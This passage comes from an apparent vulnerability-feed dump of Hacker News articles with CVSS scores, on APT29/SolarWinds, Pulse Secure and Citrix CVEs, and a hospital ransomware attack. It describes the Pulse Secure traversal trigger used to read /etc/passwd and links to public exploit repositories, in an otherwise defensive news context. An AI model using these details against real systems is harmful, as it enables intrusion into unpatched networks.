accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. 
agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\n[](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 
2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-15T16:55:00", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", 
"CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-04T10:27:04", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. 
sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne out by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual 
property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-27T09:14:00", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-28T06:42:30", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:30", "description": "[](<https://thehackernews.com/images/-_SvUUuvh0ss/XpmKGXtsseI/AAAAAAAAAPI/SuMNxubahJUd3z_eE6vcjjgsuPoYjkdawCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-2.jpg>)\n\nThe United States Cybersecurity and Infrastructure Security Agency (CISA) yesterday issued a [fresh 
advisory](<https://www.us-cert.gov/ncas/alerts/aa20-107a>) alerting organizations to change all their Active Directory credentials as a defense against cyberattacks trying to leverage a known remote code execution (RCE) vulnerability in Pulse Secure VPN servers\u2014even if they have already patched it. \n \nThe warning comes three months after another [CISA alert](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) urging users and administrators to [patch Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>) environments to thwart attacks exploiting the vulnerability. \n \n\"Threat actors who successfully exploited CVE-2019-11510 and stole a victim organization's credentials will still be able to access \u2014 and move laterally through \u2014 that organization's network after the organization has patched this vulnerability if the organization did not change those stolen credentials,\" CISA said. \n \nCISA has also [released a tool to help](<https://github.com/cisagov/check-your-pulse>) network administrators look for any indicators of compromise associated with the flaw. \n \n\n\n## A Remote Code Execution Flaw\n\n \nTracked as [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), the pre-authentication arbitrary file read vulnerability could allow remote unauthenticated attackers to compromise vulnerable VPN servers and gain access to all active users and their plain-text credentials, and execute arbitrary commands. 
\n \n\n\n[](<https://thehackernews.com/images/-9lA8I2RLHGU/XpmBkUgmolI/AAAAAAAA2qg/xhY8D8d5TDs7mVoKQo3kFZmB8fmEu1yvwCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability.jpg>)\n\n \nThe flaw stems from the fact that [directory traversal](<https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/>) is hard-coded to be allowed if a path contains \"dana/html5/acc,\" thus allowing an attacker to send specially crafted URLs to read sensitive files, such as \"/etc/passwd\" that contains information about each user on the system. \n \nTo address this issue, Pulse Secure released an [out-of-band patch](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) on April 24, 2019. \n \n[](<https://thehackernews.com/images/-JoiStCZj61c/XpmChlfPXpI/AAAAAAAAAO8/x_r1K3sIkukYxwR0UcxXPcNLaxvuDvrmQCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-1.jpg>) \n \nWhile on August 24, 2019, security intelligence firm Bad Packets was able to discover [14,528 unpatched](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) Pulse Secure servers, a subsequent scan as of last month yielded [2,099 vulnerable endpoints](<https://twitter.com/bad_packets/status/1242289478334427139>), indicating that a vast majority of organizations have patched their VPN gateways. \n \n\n\n## Unpatched VPN Servers Become Lucrative Target\n\n \nThe fact that there are still thousands of unpatched Pulse Secure VPN servers has made them a lucrative target for bad actors to distribute malware. \n \nA report from ClearSky found Iranian state-sponsored [hackers using CVE-2019-11510](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>), among others, to penetrate and steal information from target IT and telecommunication companies across the world. 
\n \nAccording to an [NSA advisory](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>) from October 2019, the \"exploit code is freely available online via the Metasploit framework, as well as GitHub. Malicious cyber actors are actively using this exploit code.\" \n \nIn a similar alert issued last year, the UK's National Cyber Security Centre ([NCSC](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)) warned that advanced threat groups are exploiting the vulnerability to target government, military, academic, business, and healthcare organizations. \n \nMore recently, [Travelex](<https://www.bbc.com/news/business-51017852>), the foreign currency exchange and travel insurance firm, became a victim after cybercriminals planted Sodinokibi (REvil) [ransomware](<https://doublepulsar.com/big-game-ransomware-being-delivered-to-organisations-via-pulse-secure-vpn-bd01b791aad9>) on the company's networks via the Pulse Secure vulnerability. Although the ransomware operators demanded a ransom of $6 million (\u00a34.6 million), a [Wall Street Journal](<https://www.wsj.com/articles/travelex-paid-hackers-multimillion-dollar-ransom-before-hitting-new-obstacles-11586440800>) report last week said it paid $2.3 million in the form of 285 Bitcoin to resolve its problem. \n \nIn the face of ongoing attacks, it's recommended that organizations upgrade their Pulse Secure VPN, reset their credentials, and scan for unauthenticated log requests and exploit attempts. \n \nCISA has also suggested removing any unapproved remote access programs and inspecting scheduled tasks for scripts or executables that may allow an attacker to connect to an environment. 
\n \nFor more steps to mitigate the flaw, head to [NSA's advisory here](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-17T11:20:00", "type": "thn", "title": "CISA Warns Patched Pulse Secure VPNs Could Still Expose Organizations to Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-04-17T11:20:03", "id": "THN:46994B7A671ED65AD9975F25F514C6E3", "href": "https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:08", "description": "[](<https://thehackernews.com/images/-YFnAQDBLWlw/X2h9bFB25hI/AAAAAAAAAyE/jMecIXHH_sMcXYoQN-b9qTiy868SAREGgCLcBGAsYHQ/s728/ransomware-attack-on-hospital.jpg>)\n\n \nGerman authorities last week [disclosed](<https://apnews.com/cf8f8eee1adcec69bcc864f2c4308c94>) that a ransomware attack on the University Hospital of D\u00fcsseldorf (UKD) caused a failure of IT systems, resulting in the death of a woman who had to 
be sent to another hospital that was 20 miles away.\n\nThe incident marks the first recorded casualty as a consequence of cyberattacks on critical healthcare facilities, which have ramped up in recent months.\n\nThe attack, which exploited a Citrix ADC [CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) vulnerability to cripple the hospital systems on September 10, is said to have been \"misdirected\" in that it was originally intended for Heinrich Heine University, according to an extortion note left by the perpetrators.\n\nAfter law enforcement contacted the threat actors and informed them that they had encrypted a hospital, the operators behind the attack withdrew the ransom demand and provided the decryption key.\n\nThe case is currently being treated as a homicide, BBC News [reported](<https://www.bbc.com/news/technology-54204356>) over the weekend.\n\n### Unpatched Vulnerabilities Become Gateway to Ransomware Attacks\n\nAlthough several ransomware gangs said early on in the pandemic that they would not deliberately [target hospitals or medical facilities](<https://thehackernews.com/2016/11/hospital-cyber-attack-virus.html>), the recurring attacks [prompted Interpol](<https://thehackernews.com/2020/04/cronavirus-hackers.html>) to issue a warning cautioning hospitals against ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments.\n\nWeak credentials and VPN vulnerabilities have proven to be a blessing in disguise for threat actors to break into the internal networks of businesses and organizations, leading cybersecurity agencies in the U.S. and U.K. 
to publish [multiple](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>) [advisories](<https://www.ncsc.gov.uk/news/citrix-alert>) about active exploitation of the flaws.\n\n\"The [Federal Office for Information Security] is becoming increasingly aware of incidents in which Citrix systems were compromised before the security updates that were made available in January 2020 were installed,\" the German cybersecurity agency [said](<https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2020/UKDuesseldorf_170920.html>) in an alert last week.\n\n\"This means that attackers still have access to the system and the networks behind it even after the security gap has been closed. This possibility is currently increasingly being used to carry out attacks on affected organizations.\"\n\nThe development also coincides with a fresh [advisory](<https://www.ncsc.gov.uk/news/alert-targeted-ransomware-attacks-on-uk-education-sector>) from the U.K. National Cyber Security Centre (NCSC), which said it's observed an uptick in ransomware incidents targeting educational institutions at least since August 2020, while urging schools and universities to implement a \"defence in depth\" strategy to defend against such malware attacks.\n\nSome of the affected institutions included [Newcastle](<https://www.ncl.ac.uk/itservice/latest-news/>) and [Northumbria](<https://www.bbc.com/news/uk-england-tyne-53989404>) Universities, among others.\n\nCiting Remote Desktop Protocol (RDP), vulnerable software or hardware, and email phishing as the three most common infection vectors, the agency [recommended](<https://blog.emsisoft.com/en/36921/8-critical-steps-to-take-after-a-ransomware-attack-ransomware-response-guide-for-businesses/>) organizations to maintain up-to-date offline backups, adopt endpoint malware protection, secure RDP services using multi-factor authentication, and have an effective patch management strategy in place.\n\n### A Spike in Ransomware Infections\n\nIf 
anything, the ransomware crisis seems to be only getting worse. [Historical data](<https://sites.temple.edu/care/ci-rw-attacks/>) gathered by Temple University's CARE cybersecurity lab has shown that there have been a total of 687 publicly disclosed cases in the U.S. since 2013, with 2019 and 2020 alone accounting for more than half of all reported incidents (440).\n\nGovernment facilities, educational institutions, and healthcare organizations are the most frequently hit sectors, as per the analysis.\n\nAnd if 2020 is any indication, attacks against colleges and universities are showing no signs of slowing down.\n\n[](<https://thehackernews.com/images/-w1AP-pVwnR0/X2h7szFvYJI/AAAAAAAAAx4/R2M_VI5F2gUCV9Dq0WYitww8OQ_Uz2P1gCLcBGAsYHQ/s0/ransomware-malware-attack-on-universities.jpg>)\n\nAllan Liska, a threat intelligence analyst at Recorded Future, revealed there had been at least 80 publicly reported ransomware infections targeting the education sector to date this year, a massive jump from 43 ransomware attacks for the whole of 2019.\n\n\"Part of this change can be attributed to extortion sites, which force more victims to announce attacks,\" Liska said in a [tweet](<https://twitter.com/uuallan/status/1307684719593746432>). \"But, in general, ransomware actors have more interest in going after colleges and universities, and they are often easy targets.\"\n\nYou can read more about NCSC's mitigation measures [here](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>). For more guidance on proofing businesses against ransomware attacks, head to the US Cybersecurity and Infrastructure Security Agency's response guide [here](<https://us-cert.cisa.gov/security-publications/Ransomware>).\n",
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-21T10:20:00", "type": "thn", "title": "A Patient Dies After Ransomware Attack Paralyzes German Hospital Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-09-21T10:34:14", "id": "THN:EB3F9784BB2A52721953F128D1B3EAEC", "href": "https://thehackernews.com/2020/09/a-patient-dies-after-ransomware-attack.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:52", "description": "[](<https://thehackernews.com/images/-C3dSDFvJiqA/XiW3-49gerI/AAAAAAAABUA/ZZoejAM3OJUPzdMEoE_ef-Wyi7-BtaokACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway-hacking.jpg>)\n\nCitrix has finally started rolling out security patches for a critical [vulnerability in ADC and Gateway](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>) software that attackers 
started exploiting in the wild earlier this month after the company announced the existence of the issue without releasing any permanent fix. \n \nI wish I could say, \"better late than never,\" but since hackers don't waste time or miss any opportunity to exploit vulnerable systems, even a short window of time resulted in the compromise of hundreds of Internet-exposed Citrix ADC and Gateway systems. \n \nAs explained earlier on The Hacker News, the vulnerability, tracked as **CVE-2019-19781**, is a path traversal issue that could allow unauthenticated remote attackers to execute arbitrary code on several versions of Citrix ADC and Gateway products, as well as on the two older versions of Citrix SD-WAN WANOP. \n \nRated critical with CVSS v3.1 base score 9.8, the issue was discovered by Mikhail Klyuchnikov, a security researcher at Positive Technologies, who responsibly reported it to Citrix in early December. \n \nThe vulnerability has been actively exploited in the wild since last week by dozens of hacking groups and individual attackers\u2014thanks to the public release of multiple [proof-of-concept exploits](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>). \n \nAccording to cyber security [experts](<https://twitter.com/0xDUDE/status/1218988914272362496?s=08>), as of today, there are over 15,000 publicly accessible vulnerable Citrix ADC and Gateway servers that attackers can exploit overnight to target potential enterprise networks. \n \nFireEye experts found an attack campaign where someone was compromising vulnerable Citrix ADCs to install a previously-unseen payload, dubbed \"[NotRobin](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>),\" that scans systems for cryptominers and malware deployed by other potential attackers and removes them to maintain exclusive backdoor access. 
\n \n\n\n> [#Citrix](<https://twitter.com/hashtag/Citrix?src=hash&ref_src=twsrc%5Etfw>) released a free tool that analyzes available log sources and system forensic artifacts to identify whether an ADC appliance has potentially been compromised using CVE-2019-19781 security flaw. \n \nYou can find the tool and instructions here: <https://t.co/eewijzI2l9>[#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/YKMwgPzmYE>\n> \n> \u2014 The Hacker News (@TheHackersNews) [January 22, 2020](<https://twitter.com/TheHackersNews/status/1219994163581554689?ref_src=twsrc%5Etfw>)\n\n \n \n\"This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device,\" FireEye said. \n \n\"FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators.\" \n \n\n\n## Citrix Patch Timeline: Stay Tuned for More Software Updates!\n\n \nLast week Citrix [announced a timeline](<https://twitter.com/TheHackersNews/status/1216239812249702401>), promising to release patched firmware updates for all supported versions of ADC and Gateway software before the end of January 2020, as shown in the chart. 
\n\n\n[](<https://thehackernews.com/images/-GFKY1pukwgU/XiWsvTjWRzI/AAAAAAAABT0/6B9St94Mff0LZyZw6yzG2oMefLn6gMgGACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway.jpg>)\n\nAs part of its [first batch of updates](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>), Citrix today released permanent patches for ADC versions 11.1 and 12.0 that also apply to \"ADC and Gateway VPX hosted on ESX, Hyper-V, KVM, XenServer, Azure, AWS, GCP or on a Citrix ADC Service Delivery Appliance (SDX).\" \n \n\"It is necessary to upgrade all Citrix ADC and Citrix Gateway 11.1 instances (MPX or VPX) to build 11.1.63.15 to install the security vulnerability fixes. It is necessary to upgrade all Citrix ADC and Citrix Gateway 12.0 instances (MPX or VPX) to build 12.0.63.13 to install the security vulnerability fixes,\" Citrix said in its advisory. \n \n\"We urge customers to install these fixes immediately,\" the company said. \"If you have not already done so, you need to apply the previously supplied mitigation to ADC versions 12.1, 13, 10.5, and SD-WAN WANOP versions 10.2.6 and 11.0.3 until the fixes for those versions are available.\" \n \nThe company also warned that customers with multiple ADC versions in production must apply the correct version of patch to each system separately. \n \nBesides installing available patches for supported versions and applying the recommended mitigation for unpatched systems, Citrix ADC administrators are also advised to monitor their device logs for attacks. 
\n \n**UPDATE \u2014 **Citrix on Thursday also released [second batch of permanent security patches](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>) for critical RCE vulnerability affecting ADC and Gateway versions 12.1 and 13.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-20T14:24:00", "type": "thn", "title": "Citrix Releases Patches for Critical ADC Vulnerability Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-24T07:05:37", "id": "THN:166AAAF7F04EF01C9E049500387BD1FD", "href": "https://thehackernews.com/2020/01/citrix-adc-patch-update.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:53", "description": "[](<https://thehackernews.com/images/-_9-nocA92TI/XhmeU1ZwSqI/AAAAAAAA2KQ/m0YexAlFrVQzvw1H2fYT8uoiFY33g82DQCLcBGAsYHQ/s728-e100/citrix-adc-gateway-vulnerability.jpg>)\n\nIt's now or never to prevent your enterprise servers running vulnerable versions of Citrix application delivery, load balancing, and 
Gateway solutions from getting hacked by remote attackers. \n \nWhy the urgency? Earlier today, multiple groups publicly released weaponized proof-of-concept exploit code [[1](<https://github.com/trustedsec/cve-2019-19781>), [2](<https://github.com/projectzeroindia/CVE-2019-19781>)] for a recently disclosed remote code execution vulnerability in Citrix's NetScaler ADC and Gateway products that could allow anyone to leverage them to take full control over potential enterprise targets. \n \nJust before the last Christmas and year-end holidays, Citrix [announced](<https://support.citrix.com/article/CTX267027>) that its Citrix Application Delivery Controller (ADC) and Citrix Gateway are vulnerable to a critical path traversal flaw (CVE-2019-19781) that could allow an unauthenticated attacker to perform arbitrary code execution on vulnerable servers. \n \nCitrix confirmed that the flaw affects all supported versions of the software, including: \n \n\n\n * Citrix ADC and Citrix Gateway version 13.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.1 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 11.1 all supported builds\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds\n \nThe company made the disclosure without releasing any security patches for vulnerable software; instead, [Citrix offered mitigation](<https://support.citrix.com/article/CTX267679>) to help administrators guard their servers against potential remote attacks\u2014and even at the time of writing, there's no patch available almost 23 days after disclosure. 
